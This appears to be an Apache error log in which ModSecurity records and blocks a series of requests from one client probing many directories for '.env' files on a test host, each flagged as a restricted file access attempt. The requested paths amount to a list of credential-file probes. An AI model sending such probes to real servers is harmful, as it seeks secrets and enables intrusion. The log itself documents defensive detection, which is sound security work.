[Thu Nov 27 08:08:46.627477 2025] [:error] [pid 353185] [client 52.59.210.188:55598] [client 52.59.210.188] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /core/app/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/core/app/.env"] [unique_id "aSf4_nTG8IrOxOxezX5AVgAAAAE"]
[Thu Nov 27 08:08:46.627706 2025] [:error] [pid 353185] [client 52.59.210.188:55598] [client 52.59.210.188] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/core/app/.env"] [unique_id "aSf4_nTG8IrOxOxezX5AVgAAAAE"]
[Thu Nov 27 08:08:46.627893 2025] [:error] [pid 353185] [client 52.59.210.188:55598] [client 52.59.210.188] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/core/app/.env"] [unique_id "aSf4_nTG8IrOxOxezX5AVgAAAAE"]
[Thu Nov 27 08:08:46.699847 2025] [:error] [pid 354740] [client 52.59.210.188:55620] [client 52.59.210.188] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /core/datavase/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/core/Datavase/.env"] [unique_id "aSf4_iz_tey498iHQ9agCAAAAAc"]
[Thu Nov 27 08:08:46.700083 2025] [:error] [pid 354740] [client 52.59.210.188:55620] [client 52.59.210.188] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/core/Datavase/.env"] [unique_id "aSf4_iz_tey498iHQ9agCAAAAAc"]
[Thu Nov 27 08:08:46.700264 2025] [:error] [pid 354740] [client 52.59.210.188:55620] [client 52.59.210.188] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/core/Datavase/.env"] [unique_id "aSf4_iz_tey498iHQ9agCAAAAAc"]
[Thu Nov 27 08:08:46.769888 2025] [:error] [pid 354739] [client 52.59.210.188:55642] [client 52.59.210.188] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /database/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/database/.env"] [unique_id "aSf4_u_UStX-GTeIAe_uqgAAAAY"]
[Thu Nov 27 08:08:46.770116 2025] [:error] [pid 354739] [client 52.59.210.188:55642] [client 52.59.210.188] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/database/.env"] [unique_id "aSf4_u_UStX-GTeIAe_uqgAAAAY"]
[Thu Nov 27 08:08:46.770359 2025] [:error] [pid 354739] [client 52.59.210.188:55642] [client 52.59.210.188] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/database/.env"] [unique_id "aSf4_u_UStX-GTeIAe_uqgAAAAY"]
[Thu Nov 27 08:08:46.838566 2025] [:error] [pid 354741] [client 52.59.210.188:55660] [client 52.59.210.188] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /config/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/config/.env"] [unique_id "aSf4_s6T76P9_m8d0ivoZQAAAAg"]
[Thu Nov 27 08:08:46.838793 2025] [:error] [pid 354741] [client 52.59.210.188:55660] [client 52.59.210.188] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/config/.env"] [unique_id "aSf4_s6T76P9_m8d0ivoZQAAAAg"]
[Thu Nov 27 08:08:46.838970 2025] [:error] [pid 354741] [client 52.59.210.188:55660] [client 52.59.210.188] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/config/.env"] [unique_id "aSf4_s6T76P9_m8d0ivoZQAAAAg"]
[Thu Nov 27 08:08:46.914546 2025] [:error] [pid 353187] [client 52.59.210.188:55692] [client 52.59.210.188] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /assets/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/assets/.env"] [unique_id "aSf4_njjVMPW7zDRgsawFAAAAAM"]
[Thu Nov 27 08:08:46.914832 2025] [:error] [pid 353187] [client 52.59.210.188:55692] [client 52.59.210.188] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/assets/.env"] [unique_id "aSf4_njjVMPW7zDRgsawFAAAAAM"]
[Thu Nov 27 08:08:46.915029 2025] [:error] [pid 353187] [client 52.59.210.188:55692] [client 52.59.210.188] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/assets/.env"] [unique_id "aSf4_njjVMPW7zDRgsawFAAAAAM"]
[Thu Nov 27 08:08:47.028071 2025] [authz_core:error] [pid 354737] [client 52.59.210.188:55736] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/.env
[Thu Nov 27 08:08:47.110507 2025] [:error] [pid 353186] [client 52.59.210.188:55760] [client 52.59.210.188] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /apps/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/apps/.env"] [unique_id "aSf4_yOJA5NFmjDGU5hICgAAAAI"]
[Thu Nov 27 08:08:47.110745 2025] [:error] [pid 353186] [client 52.59.210.188:55760] [client 52.59.210.188] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/apps/.env"] [unique_id "aSf4_yOJA5NFmjDGU5hICgAAAAI"]
[Thu Nov 27 08:08:47.110936 2025] [:error] [pid 353186] [client 52.59.210.188:55760] [client 52.59.210.188] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/apps/.env"] [unique_id "aSf4_yOJA5NFmjDGU5hICgAAAAI"]
[Thu Nov 27 08:08:47.220738 2025] [:error] [pid 353188] [client 52.59.210.188:55790] [client 52.59.210.188] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /uploads/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/uploads/.env"] [unique_id "aSf4_z4fHjXDucK3GWvWbQAAAAQ"]
[Thu Nov 27 08:08:47.220956 2025] [:error] [pid 353188] [client 52.59.210.188:55790] [client 52.59.210.188] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/uploads/.env"] [unique_id "aSf4_z4fHjXDucK3GWvWbQAAAAQ"]
[Thu Nov 27 08:08:47.221163 2025] [:error] [pid 353188] [client 52.59.210.188:55790] [client 52.59.210.188] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/uploads/.env"] [unique_id "aSf4_z4fHjXDucK3GWvWbQAAAAQ"]
[Thu Nov 27 08:08:47.288840 2025] [:error] [pid 353184] [client 52.59.210.188:55818] [client 52.59.210.188] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /sitemaps/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/sitemaps/.env"] [unique_id "aSf4_4G5PbbCKE0XPKZggwAAAAA"]
[Thu Nov 27 08:08:47.289057 2025] [:error] [pid 353184] [client 52.59.210.188:55818] [client 52.59.210.188] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/sitemaps/.env"] [unique_id "aSf4_4G5PbbCKE0XPKZggwAAAAA"]
[Thu Nov 27 08:08:47.289241 2025] [:error] [pid 353184] [client 52.59.210.188:55818] [client 52.59.210.188] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/sitemaps/.env"] [unique_id "aSf4_4G5PbbCKE0XPKZggwAAAAA"]
[Thu Nov 27 08:08:47.356486 2025] [:error] [pid 353185] [client 52.59.210.188:55838] [client 52.59.210.188] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /saas/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/saas/.env"] [unique_id "aSf4_3TG8IrOxOxezX5AVwAAAAE"]
[Thu Nov 27 08:08:47.356722 2025] [:error] [pid 353185] [client 52.59.210.188:55838] [client 52.59.210.188] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/saas/.env"] [unique_id "aSf4_3TG8IrOxOxezX5AVwAAAAE"]
[Thu Nov 27 08:08:47.356930 2025] [:error] [pid 353185] [client 52.59.210.188:55838] [client 52.59.210.188] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/saas/.env"] [unique_id "aSf4_3TG8IrOxOxezX5AVwAAAAE"]
[Thu Nov 27 08:08:47.425758 2025] [:error] [pid 354740] [client 52.59.210.188:55856] [client 52.59.210.188] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "aSf4_yz_tey498iHQ9agCQAAAAc"]
[Thu Nov 27 08:08:47.425981 2025] [:error] [pid 354740] [client 52.59.210.188:55856] [client 52.59.210.188] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "aSf4_yz_tey498iHQ9agCQAAAAc"]
[Thu Nov 27 08:08:47.426175 2025] [:error] [pid 354740] [client 52.59.210.188:55856] [client 52.59.210.188] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "aSf4_yz_tey498iHQ9agCQAAAAc"]
[Thu Nov 27 08:08:47.497550 2025] [:error] [pid 354739] [client 52.59.210.188:55878] [client 52.59.210.188] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /psnlink/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/psnlink/.env"] [unique_id "aSf4_-_UStX-GTeIAe_uqwAAAAY"]
[Thu Nov 27 08:08:47.497786 2025] [:error] [pid 354739] [client 52.59.210.188:55878] [client 52.59.210.188] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/psnlink/.env"] [unique_id "aSf4_-_UStX-GTeIAe_uqwAAAAY"]
[Thu Nov 27 08:08:47.498005 2025] [:error] [pid 354739] [client 52.59.210.188:55878] [client 52.59.210.188] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/psnlink/.env"] [unique_id "aSf4_-_UStX-GTeIAe_uqwAAAAY"]
[Thu Nov 27 08:08:47.570217 2025] [:error] [pid 354741] [client 52.59.210.188:55904] [client 52.59.210.188] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /exapi/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/exapi/.env"] [unique_id "aSf4_86T76P9_m8d0ivoZgAAAAg"]
[Thu Nov 27 08:08:47.570475 2025] [:error] [pid 354741] [client 52.59.210.188:55904] [client 52.59.210.188] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/exapi/.env"] [unique_id "aSf4_86T76P9_m8d0ivoZgAAAAg"]
[Thu Nov 27 08:08:47.570664 2025] [:error] [pid 354741] [client 52.59.210.188:55904] [client 52.59.210.188] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/exapi/.env"] [unique_id "aSf4_86T76P9_m8d0ivoZgAAAAg"]
[Thu Nov 27 08:08:47.642925 2025] [:error] [pid 353187] [client 52.59.210.188:55924] [client 52.59.210.188] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /site/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/site/.env"] [unique_id "aSf4_3jjVMPW7zDRgsawFQAAAAM"]
[Thu Nov 27 08:08:47.643140 2025] [:error] [pid 353187] [client 52.59.210.188:55924] [client 52.59.210.188] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/site/.env"] [unique_id "aSf4_3jjVMPW7zDRgsawFQAAAAM"]
[Thu Nov 27 08:08:47.643320 2025] [:error] [pid 353187] [client 52.59.210.188:55924] [client 52.59.210.188] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/site/.env"] [unique_id "aSf4_3jjVMPW7zDRgsawFQAAAAM"]
[Thu Nov 27 08:08:47.709304 2025] [:error] [pid 354737] [client 52.59.210.188:55940] [client 52.59.210.188] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /admin/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/admin/.env"] [unique_id "aSf4_3eYAxY_xo8wsP-UdwAAAAU"]
